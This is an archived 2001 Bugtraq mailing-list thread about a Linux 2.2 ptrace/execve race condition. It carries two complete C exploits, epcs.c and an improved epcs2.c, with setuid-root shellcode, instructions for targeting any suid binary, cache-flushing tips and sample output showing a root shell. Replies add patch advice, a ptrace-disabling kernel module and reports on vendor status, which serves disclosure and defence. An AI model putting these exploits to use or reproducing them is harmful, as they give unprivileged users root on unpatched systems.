6278842 2001-03-27 14:05 +0200 /45 rader/ Wojciech Purczynski <wp@ELZABSOFT.PL>
Sänt av: joel@lysator.liu.se
Importerad: 2001-03-27 17:55 av Brevbäraren (som är implementerad i) Python
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: wp@ELZABSOFT.PL
Mottagare: Bugtraq (import) <16154>
Ärende: ptrace/execve race condition exploit (non brute-force)
------------------------------------------------------------
Hi,
Here is exploit for ptrace/execve race condition bug in Linux kernels
up to 2.2.18.
It works even on openwall patched kernels (including broken fix in
2.2.18ow4) if you use address of BSS section in memory (use objdump
-h /suid/binary to get .bss section address).
It does not use brute-force! It does only one attemt, parent process
detects exact moment of context-switch after child goes sleep in
execve.
If you have some problems, ensure that suid binary you want to sploit
does not exist in disk cache.
For more info read comments in the source code.
It has been broken in two places.
Sample output:
[wp@wp /tmp]$ uname -a
Linux wp.local.elzabsoft.pl 2.2.14-5.0 #1 Tue Mar 7 21:07:39 EST 2000 i686
unknown
[wp@wp /tmp]$ objdump -h /bin/su | grep .bss
8 .rel.bss 00000030 08048ca8 08048ca8 00000ca8 2**2
21 .bss 000000d4 0804bf04 0804bf04 00002f04 2**2
[wp@wp /tmp]$ find / >dev/null 2>&1
[wp@wp /tmp]$ ./epcs /bin/su 0x0804bf04
Bug exploited successfully.
sh-2.03#
It works with any suid binary.
Cheers,
wp
+---------------------------------------------------------+
| Wojciech Purczyñski Linux Administrator |
| wp@elzabsoft.pl http://www.elzabsoft.pl/~wp |
| +48604432981 http://www.elzabsoft.pl/~wp/gpg.asc |
+---------------------------------------------------------+
(6278842) /Wojciech Purczynski <wp@ELZABSOFT.PL>/(Ombruten)
Bilaga (text/plain) i text 6278843
6278843 2001-03-27 14:05 +0200 /175 rader/ Wojciech Purczynski <wp@ELZABSOFT.PL>
Bilagans filnamn: "epcs.c"
Importerad: 2001-03-27 17:55 av Brevbäraren (som är implementerad i) Python
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: wp@ELZABSOFT.PL
Mottagare: Bugtraq (import) <16155>
Bilaga (text/plain) till text 6278842
Ärende: Bilaga (epcs.c) till: ptrace/execve race condition exploit (non brute-force)
------------------------------------------------------------
/*
* epcs v2
* ~~~~~~~
* exploit for execve/ptrace race condition in Linux kernel up to 2.2.18
*
* (c) 2001 Wojciech Purczynski / cliph / <wp@elzabsoft.pl>
*
* This sploit does _not_ use brute force. It does not need that.
* It does only one attemt to sploit the race condition in execve.
* Parent process waits for a context-switch that occur after
* child task sleep in execve.
*
* It should work even on openwall-patched kernels (I haven't tested it).
*
* Compile it:
* cc epcs.c -o epcs
* Usage:
* ./epcs [victim] [address]
*
* It gives instant root shell with any of a suid binaries.
*
* If it does not work, try use some methods to ensure that execve
* would sleep while loading binary file into memory,
*
* i.e.: cat /usr/lib/* >/dev/null 2>&1
*
* Tested on RH 7.0 and RH 6.2 / 2.2.14 / 2.2.18 / 2.2.18ow4
* This exploit does not work on 2.4.x because kernel won't set suid
* privileges if user ptraces a binary.
* But it is still exploitable on these kernels.
*
* Thanks to Bulba (he made me to take a look at this bug ;) )
* Greetings to SigSegv team.
*
*/
#include <stdio.h>
#include <fcntl.h>
#include <sys/types.h>
#include <signal.h>
#include <linux/user.h>
#include <sys/wait.h>
#include <limits.h>
#include <errno.h>
#include <stdlib.h>
#define CS_SIGNAL SIGUSR1
#define VICTIM "/usr/bin/passwd"
#define SHELL "/bin/sh"
#define SHELL_LEN "\x07" /* strlen(SHELL) in hex */
#define SHELLCODE 0x00000000 /* address to put shellcode at */
/*
* This is my private shellcode.
* Offset 0x0a - executable's filename length.
*/
char shellcode[1024]=
"\xeb\xfe"
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80" /* setuid(0) */
"\x31\xc0\xb0\x2e\xcd\x80"
"\x31\xc0\x50\xeb\x17\x8b\x1c\x24" /* execve(SHELL) */
"\x88\x43" SHELL_LEN "\x89\xe1\x8d\x54\x24"
"\x04\xb0\x0b\xcd\x80\x31\xc0\x89"
"\xc3\x40\xcd\x80\xe8\xe4\xff\xff"
"\xff" SHELL ;
volatile int cs_detector=0;
void cs_sig_handler(int sig)
{
cs_detector=1;
}
void do_victim(char * filename)
{
while (!cs_detector) ;
kill(getppid(), CS_SIGNAL);
execl(filename, filename, NULL);
perror("execl");
exit(-1);
}
int check_execve(pid_t victim, char * filename)
{
char path[PATH_MAX+1];
char link[PATH_MAX+1];
int res;
snprintf(path, sizeof(path), "/proc/%i/exe", (int)victim);
if (readlink(path, link, sizeof(link)-1)<0) {
perror("readlink");
return -1;
}
link[sizeof(link)-1]='\0';
res=!strcmp(link, filename);
if (res) fprintf(stderr, "Child slept outside of execve\n");
return res;
}
int main(int argc, char * argv[])
{
char * filename=VICTIM;
pid_t victim;
int error, i;
unsigned long eip=SHELLCODE;
struct user_regs_struct regs;
if (argc>1) filename=argv[1];
if (argc>2) eip=strtoul(argv[2], NULL, 16);
signal(CS_SIGNAL, cs_sig_handler);
victim=fork();
if (victim<0) {
perror("fork: victim");
exit(-1);
}
if (victim==0) do_victim(filename);
kill(victim, CS_SIGNAL);
while (!cs_detector) ;
if (ptrace(PTRACE_ATTACH, victim)) {
perror("ptrace: PTRACE_ATTACH");
goto exit;
}
if (check_execve(victim, filename))
goto exit;
(void)waitpid(victim, NULL, WUNTRACED);
if (ptrace(PTRACE_CONT, victim, 0, 0)) {
perror("ptrace: PTRACE_CONT");
goto exit;
}
(void)waitpid(victim, NULL, WUNTRACED);
if (ptrace(PTRACE_GETREGS, victim, 0, ®s)) {
perror("ptrace: PTRACE_GETREGS");
goto exit;
}
regs.eip=eip;
for (i=0; i<strlen(shellcode); i+=4) {
if (ptrace(PTRACE_POKEDATA, victim, regs.eip+i,
*(int*)(shellcode+i))) {
perror("ptrace: PTRACE_POKETEXT");
goto exit;
}
}
if (ptrace(PTRACE_GETREGS, victim, 0, ®s)) {
perror("ptrace: PTRACE_GETREGS");
goto exit;
}
fprintf(stderr, "Bug exploited successfully.\n");
if (ptrace(PTRACE_DETACH, victim, 0, 0)) {
perror("ptrace: PTRACE_CONT");
goto exit;
}
(void)waitpid(victim, NULL, 0);
return 0;
exit:
fprintf(stderr, "Error!\n");
kill(victim, SIGKILL);
return -1;
}
(6278843) /Wojciech Purczynski <wp@ELZABSOFT.PL>/---
Kommentar i text 6278984 av Jerker Nyberg
6280381 2001-03-27 20:37 +0200 /77 rader/ Wouter de Jong <wouter@WIDEXS.NL>
Sänt av: joel@lysator.liu.se
Importerad: 2001-03-28 06:56 av Brevbäraren
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: wouter@WIDEXS.NL
Mottagare: Bugtraq (import) <16180>
Kommentar till text 6278842 av Wojciech Purczynski <wp@ELZABSOFT.PL>
Ärende: Re: ptrace/execve race condition exploit (non brute-force)
------------------------------------------------------------
From: Wouter de Jong <wouter@WIDEXS.NL>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <20010327203749.A3131@widexs.nl>
On Tue, Mar 27, 2001 at 02:05:54PM +0200, Wojciech Purczynski wrote:
>
> Hi,
Hi,
> Here is exploit for ptrace/execve race condition bug in Linux kernels up
> to 2.2.18.
>
> It works even on openwall patched kernels (including broken fix in 2.2.18ow4)
> if you use address of BSS section in memory (use objdump -h /suid/binary
> to get .bss section address).
>
> It does not use brute-force! It does only one attemt, parent process detects
> exact moment of context-switch after child goes sleep in execve.
>
> If you have some problems, ensure that suid binary you want to sploit does
> not exist in disk cache.
>
> For more info read comments in the source code.
>
> It has been broken in two places.
<cut sample>
> It works with any suid binary.
I've tried this on several hosts, all with 2.2.18 (not all ow4)
(RedHat 6.2 + Slackware 7.1), and they gave me ither the following
result :
ptrace: PTRACE_ATTACH: Operation not permitted
Error!
Or :
[wouter@nivedita wouter]$ uname -a
Linux nivedita 2.2.18 #1 Tue Feb 13 20:26:05 CET 2001 i686 unknown
[wouter@nivedita wouter]$ objdump -h /bin/su | grep .bss
8 .rel.bss 00000030 08048ca8 08048ca8 00000ca8 2**2
21 .bss 000000d4 0804bf04 0804bf04 00002f04 2**2
[wouter@nivedita wouter]$ find / >/dev/null 2>&1;~/epcs /bin/su 0804bf04
Bug exploited successfully.
Password:
If I use for example : 08048ca8, I'll get this :
[wouter@nivedita wouter]$ find / >/dev/null 2>&1;~/epcs /bin/su
08048ca8 Bug exploited successfully. [wouter@nivedita wouter]$ id
uid=519(wouter) gid=519(wouter) groups=519(wouter)
> Cheers,
> wp
>
> +---------------------------------------------------------+
> | Wojciech Purczynski Linux Administrator |
> | wp@elzabsoft.pl http://www.elzabsoft.pl/~wp |
> | +48604432981 http://www.elzabsoft.pl/~wp/gpg.asc |
> +---------------------------------------------------------+
--
Met vriendelijke groet/With kind regards,
Wouter de Jong
System-Administrator/Developer
__ _
/ / (_)__ __ ____ __
/ /__/ / _ \/ // /\ \/ /
/____/_/_//_/\_._/ /_/\_\
(6280381) /Wouter de Jong <wouter@WIDEXS.NL>/(Ombruten)
6280411 2001-03-28 08:27 +0400 /40 rader/ Solar Designer <solar@OPENWALL.COM>
Sänt av: joel@lysator.liu.se
Importerad: 2001-03-28 07:44 av Brevbäraren
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: solar@OPENWALL.COM
Mottagare: Bugtraq (import) <16182>
Kommentar till text 6278842 av Wojciech Purczynski <wp@ELZABSOFT.PL>
Ärende: Re: ptrace/execve race condition exploit (non brute-force)
------------------------------------------------------------
From: Solar Designer <solar@OPENWALL.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <20010328082715.A471@openwall.com>
On Tue, Mar 27, 2001 at 02:05:54PM +0200, Wojciech Purczynski wrote:
Hi,
> Here is exploit for ptrace/execve race condition bug in Linux kernels up
> to 2.2.18.
Thanks for not releasing this before Linux 2.2.19 is out. It would
be even better if you delayed this until the vendor updates are ready
(should be very soon) like I was planning to.
> It works even on openwall patched kernels (including broken fix in 2.2.18ow4)
Yes, the fix in 2.2.18-ow4 and 2.0.39-ow2 is insufficient -- it only
reduced the window without completely fixing the race.
I'd like to thank Rafal Wojtczuk for discovering the problem with my
original fix almost immediately after its release and reporting it to
me and the affected vendors privately. Unfortunately, Linux 2.2.19
and the vendor updates couldn't be released until now for other valid
reasons(*) so I had to decide against releasing a 2.2.18-ow5, submit
the correct fix for 2.2.19 and wait until it's released.
Linux 2.2.19 is out. I've released the 2.2.19-ow1 and 2.0.39-ow3
patches yesterday:
http://www.openwall.com/linux/
Please upgrade to one of these versions.
(*) To be explained here after the vendor updates are ready.
--
/sd
(6280411) /Solar Designer <solar@OPENWALL.COM>/-----
6280613 2001-03-28 01:32 +0200 /64 rader/ Mariusz Woloszyn <emsi@IPARTNERS.PL>
Sänt av: joel@lysator.liu.se
Importerad: 2001-03-28 09:14 av Brevbäraren
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: emsi@IPARTNERS.PL
Mottagare: Bugtraq (import) <16190>
Ärende: Re: ptrace/execve race condition exploit (non brute-force)
------------------------------------------------------------
On Tue, 27 Mar 2001, Wojciech Purczynski wrote:
>
> Hi,
>
> Here is exploit for ptrace/execve race condition bug in Linux kernels up
> to 2.2.18.
>
Hi!
I've seen a tool that works better than this, useing different
aproach to the same bug explits it on all platforms giving instant
root without the need for cat garbage files to clear disk cache!!!
Anyway: here is a fast way to fix the problem (but intoduces new
one), the kernel module that disables ptrace syscall. It works for
2.0 and 2.2 kernel (I didn't tested it under 2.4). All you need to
do is:
emsi:~# gcc -c npt.c
emsi:~# insmod ./npt.o
And here is how it works:
[before installing module]
emsi:~/hack/ptrace> ./a.out /sbin/powerd
[*] Child exec...
[+] Waiting for disk sleep.... dunno why but that printf helps sometimes
;)
[OK]
[+] ATTACH: 0 : Success
[+] eip: 0x1109d0 -> 0x805a41b
[+] copy data from 0x805a3e0 to 0xbffff100
[...............]
[?] DETACH: 0 : Success
Status of 5342: R
bash#
[installing module[
bash# /sbin/insmod ./npt.o
bash# exit
emsi:~/hack/ptrace> ./a.out /sbin/reboot
[*] Child exec...
[+] Waiting for disk sleep.... dunno why but that printf helps sometimes
;)
[OK]
[--] ATTACH: Operation not permitted <==== see this
Exiting...
emsi:~/hack/ptrace> Unknown id: ELF```
It removes the posibility to trace process, but gives instant shield
against hackers.
greets: nergal, Lam3rZ, teso brothers, nises, hert and others :)
--
Mariusz Wo³oszyn
Internet Security Specialist, Internet Partners
(6280613) /Mariusz Woloszyn <emsi@IPARTNERS.PL>/(Ombruten)
Bilaga (text/plain) i text 6280614
6280614 2001-03-28 01:32 +0200 /45 rader/ Mariusz Woloszyn <emsi@IPARTNERS.PL>
Bilagans filnamn: "npt.c"
Importerad: 2001-03-28 09:14 av Brevbäraren
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: emsi@IPARTNERS.PL
Mottagare: Bugtraq (import) <16191>
Bilaga (text/plain) till text 6280613
Ärende: Bilaga (npt.c) till: Re: ptrace/execve race condition exploit (non brute-force)
------------------------------------------------------------
/* no ptrace module
fast prevention for kenrel bug
(c) 2001 a Lam3rZ odyssey
*/
#define MODULE
#define __KERNEL__
#include <linux/module.h>
#include <linux/unistd.h>
#include <sys/syscall.h>
#ifndef KERNEL_VERSION
#define KERNEL_VERSION(a,b,c) ((a)*65536+(b)*256+(c))
#endif
#if LINUX_VERSION_CODE >= KERNEL_VERSION(2,2,0)
#include <asm/unistd.h>
#endif
#if LINUX_VERSION_CODE >= KERNEL_VERSION(2,2,14)
#include <bits/syscall.h>
#endif
extern void *sys_call_table[];
int (*orig_ptrace)(int, int, int, int);
int no_ptrace (int request, int pid, int addr, int data)
{return -1;}
int init_module(void) {
orig_ptrace = sys_call_table[__NR_ptrace];
sys_call_table[__NR_ptrace]=no_ptrace;
return 0;
}
void cleanup_module(void) {
sys_call_table[__NR_ptrace]=orig_ptrace;
}
(6280614) /Mariusz Woloszyn <emsi@IPARTNERS.PL>/----
6284089 2001-03-28 12:18 +0400 /18 rader/ Solar Designer <solar@OPENWALL.COM>
Sänt av: joel@lysator.liu.se
Importerad: 2001-03-29 04:22 av Brevbäraren
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: solar@OPENWALL.COM
Mottagare: Bugtraq (import) <16211>
Kommentar till text 6280613 av Mariusz Woloszyn <emsi@IPARTNERS.PL>
Ärende: Re: ptrace/execve race condition exploit (non brute-force)
------------------------------------------------------------
From: Solar Designer <solar@OPENWALL.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <20010328121856.A1539@openwall.com>
On Wed, Mar 28, 2001 at 01:32:15AM +0200, Mariusz Woloszyn wrote:
> Anyway: here is a fast way to fix the problem (but intoduces new one), the
> kernel module that disables ptrace syscall.
Don't forget that the race isn't only against ptrace. There's
procfs. Fortunately, get_task() in fs/proc/mem.c checks for
PF_PTRACED, so the worst ways of abuse via procfs are solved with
disabling ptrace. But it is not so obvious what other attacks
remain possible.
--
/sd
(6284089) /Solar Designer <solar@OPENWALL.COM>/-----
6296937 2001-03-31 20:12 -0600 /18 rader/ Tim Yardley <yardley@UIUC.EDU>
Sänt av: joel@lysator.liu.se
Importerad: 2001-04-01 18:34 av Brevbäraren
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: yardley@UIUC.EDU
Mottagare: Bugtraq (import) <16282>
Ärende: .. ptrace improvement
------------------------------------------------------------
As always, there are always ways to improve things. This version of
the exploit posted here previously overwrites the dl _start routine
and doesnt modify eip. This will help on stack non-exec systems and
doesnt require you to calculate the bss offset. I didn't test it,
but this should still work on a stackguard compiled program as well.
your mileage may vary, and this will still suffer from the disk cache
issue (speed becoming a paramount concern). the recent post by "Ihq"
where his exploit created a big file, is one way to fill out the
cache so that the suid binary is not in the cache. manual methods
are just as easy.
rsh, gpasswd, passwd, etc etc are all common choices for hitting.
anything will work.
more details lay within the code. enjoy.
/tmy
(6296937) /Tim Yardley <yardley@UIUC.EDU>/(Ombruten)
Bilaga (text/plain) i text 6296938
Bilaga (text/plain) i text 6296939
6296938 2001-03-31 20:12 -0600 /192 rader/ Tim Yardley <yardley@UIUC.EDU>
Bilagans filnamn: "epcs2.c"
Importerad: 2001-04-01 18:34 av Brevbäraren
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: yardley@UIUC.EDU
Mottagare: Bugtraq (import) <16283>
Bilaga (text/plain) till text 6296937
Ärende: Bilaga (epcs2.c) till: .. ptrace improvement
------------------------------------------------------------
/*
* epcs2 (improved by lst [liquid@dqc.org])
* ~~~~~~~
* exploit for execve/ptrace race condition in Linux kernel up to 2.2.18
*
* originally by:
* (c) 2001 Wojciech Purczynski / cliph / <wp@elzabsoft.pl>
*
* improved by:
* lst [liquid@dqc.org]
*
* This sploit does _not_ use brute force. It does not need that.
* It does only one attemt to sploit the race condition in execve.
* Parent process waits for a context-switch that occur after
* child task sleep in execve.
*
* It should work even on openwall-patched kernels (I haven't tested it).
*
* Compile it:
* cc epcs.c -o epcs
* Usage:
* ./epcs [victim]
*
* It gives instant root shell with any of a suid binaries.
*
* If it does not work, try use some methods to ensure that execve
* would sleep while loading binary file into memory,
*
* i.e.: cat /usr/lib/* >/dev/null 2>&1
*
* Tested on RH 7.0 and RH 6.2 / 2.2.14 / 2.2.18 / 2.2.18ow4
* This exploit does not work on 2.4.x because kernel won't set suid
* privileges if user ptraces a binary.
* But it is still exploitable on these kernels.
*
* Thanks to Bulba (he made me to take a look at this bug ;) )
* Greetings to SigSegv team.
*
* -- d00t
* improved by lst [liquid@dqc.org]
* props to kevin for most of the work
*
* now works on stack non-exec systems with some neat trickery for the automated
* method, ie. no need to find the bss segment via objdump
*
* particularly it now rewrites the code instruction sets in the
* dynamic linker _start segment and continues execution from there.
*
* an aside, due to the fact that the code self-modified, it wouldnt work
* quite correctly on a stack non-exec system without playing directly with
* the bss segment (ie no regs.eip = regs.esp change). this is much more
* automated. however, do note that the previous version did not trigger stack
* non-exec warnings due to how it was operating. note that the regs.eip = regs.esp
* method will break on stack non-exec systems.
*
* as always.. enjoy.
*
*/
#include <stdio.h>
#include <fcntl.h>
#include <sys/types.h>
#include <signal.h>
#include <linux/user.h>
#include <sys/wait.h>
#include <limits.h>
#include <errno.h>
#include <stdlib.h>
#define CS_SIGNAL SIGUSR1
#define VICTIM "/usr/bin/passwd"
#define SHELL "/bin/sh"
/*
* modified simple shell code with some trickery (hand tweaks)
*/
char shellcode[]=
"\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80" /* setuid(0) */
"\x31\xc0\xb0\x2e\xcd\x80"
"\x31\xc0\x50\xeb\x17\x8b\x1c\x24" /* execve(SHELL) */
"\x90\x90\x90\x89\xe1\x8d\x54\x24" /* lets be tricky */
"\x04\xb0\x0b\xcd\x80\x31\xc0\x89"
"\xc3\x40\xcd\x80\xe8\xe4\xff\xff"
"\xff" SHELL "\x00\x00\x00" ; /* pad me */
volatile int cs_detector=0;
void cs_sig_handler(int sig)
{
cs_detector=1;
}
void do_victim(char * filename)
{
while (!cs_detector) ;
kill(getppid(), CS_SIGNAL);
execl(filename, filename, NULL);
perror("execl");
exit(-1);
}
int check_execve(pid_t victim, char * filename)
{
char path[PATH_MAX+1];
char link[PATH_MAX+1];
int res;
snprintf(path, sizeof(path), "/proc/%i/exe", (int)victim);
if (readlink(path, link, sizeof(link)-1)<0) {
perror("readlink");
return -1;
}
link[sizeof(link)-1]='\0';
res=!strcmp(link, filename);
if (res) fprintf(stderr, "child slept outside of execve\n");
return res;
}
int main(int argc, char * argv[])
{
char * filename=VICTIM;
pid_t victim;
int error, i;
struct user_regs_struct regs;
/* take our command args if you wanna play with other progs */
if (argc>1) filename=argv[1];
signal(CS_SIGNAL, cs_sig_handler);
victim=fork();
if (victim<0) {
perror("fork: victim");
exit(-1);
}
if (victim==0) do_victim(filename);
kill(victim, CS_SIGNAL);
while (!cs_detector) ;
if (ptrace(PTRACE_ATTACH, victim)) {
perror("ptrace: PTRACE_ATTACH");
goto exit;
}
if (check_execve(victim, filename))
goto exit;
(void)waitpid(victim, NULL, WUNTRACED);
if (ptrace(PTRACE_CONT, victim, 0, 0)) {
perror("ptrace: PTRACE_CONT");
goto exit;
}
(void)waitpid(victim, NULL, WUNTRACED);
if (ptrace(PTRACE_GETREGS, victim, 0, ®s)) {
perror("ptrace: PTRACE_GETREGS");
goto exit;
}
/* make sure that last null is in there */
for (i=0; i<=strlen(shellcode); i+=4) {
if (ptrace(PTRACE_POKETEXT, victim, regs.eip+i,
*(int*)(shellcode+i))) {
perror("ptrace: PTRACE_POKETEXT");
goto exit;
}
}
if (ptrace(PTRACE_SETREGS, victim, 0, ®s)) {
perror("ptrace: PTRACE_SETREGS");
goto exit;
}
fprintf(stderr, "bug exploited successfully.\nenjoy!\n");
if (ptrace(PTRACE_DETACH, victim, 0, 0)) {
perror("ptrace: PTRACE_DETACH");
goto exit;
}
(void)waitpid(victim, NULL, 0);
return 0;
exit:
fprintf(stderr, "d0h! error!\n");
kill(victim, SIGKILL);
return -1;
}
(6296938) /Tim Yardley <yardley@UIUC.EDU>/----------
6296939 2001-03-31 20:12 -0600 /12 rader/ Tim Yardley <yardley@UIUC.EDU>
Importerad: 2001-04-01 18:34 av Brevbäraren
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: yardley@UIUC.EDU
Mottagare: Bugtraq (import) <16284>
Bilaga (text/plain) till text 6296937
Ärende: Bilaga till: .. ptrace improvement
------------------------------------------------------------
-- Diving into infinity my consciousness expands in inverse
proportion to my distance from singularity
+-------- ------- ------ ----- ---- --- -- --- ------ ------- -------- -
--------------+
| Tim Yardley (yardley@uiuc.edu)
| http://www.students.uiuc.edu/~yardley/
+-------- ------- ------ ----- ---- --- -- --- ------ ------- -------- -
--------------+
(6296939) /Tim Yardley <yardley@UIUC.EDU>/----------
6311760 2001-04-04 02:03 +0200 /27 rader/ Jan Kluka <kluka@DANKA.II.FMPH.UNIBA.SK>
Sänt av: joel@lysator.liu.se
Importerad: 2001-04-04 12:29 av Brevbäraren
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: kluka@DANKA.II.FMPH.UNIBA.SK
Mottagare: Bugtraq (import) <16326>
Kommentar till text 6310169 av Viraj Alankar <valankar@IFXCORP.COM>
Ärende: Re: .. ptrace improvement
------------------------------------------------------------
From: Jan Kluka <kluka@DANKA.II.FMPH.UNIBA.SK>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <20010404020322.A22288@danka.ii.fmph.uniba.sk>
On Mon, Apr 02, 2001 at 11:03:14AM -0400, Viraj Alankar wrote:
> On Sat, 31 Mar 2001, Tim Yardley wrote:
>
> > As always, there are always ways to improve things. This version of the
> > exploit posted here previously overwrites the dl _start routine and doesnt
> > modify eip. This will help on stack non-exec systems and doesnt require
> > you to calculate the bss offset. I didn't test it, but this should still
> > work on a stackguard compiled program as well.
>
> This works on my RH 6.2 w/ 2.2.16-3. I see that Redhat released a 2.2.17
> RPM on 2/8/2001 with 'ptrace' as one of the keywords. Does anyone know if
> this RPM addresses the problem?
No! Although there is a file called linux-2.2.19-ptrace.patch in
kernel-2.2.17-14.src.rpm, the kernel from (at least)
kernel-2.2.17-14.i686.rpm IS vulnerable (tested using the improved
exploit). Maybe, recompilation from .src.rpm is worth trying, but
I've compiled 2.2.19 rather. I've submitted this to bugzilla several
minutes ago, wonder what will happen...
--
JK
(6311760) /Jan Kluka <kluka@DANKA.II.FMPH.UNIBA.SK>/(Ombruten)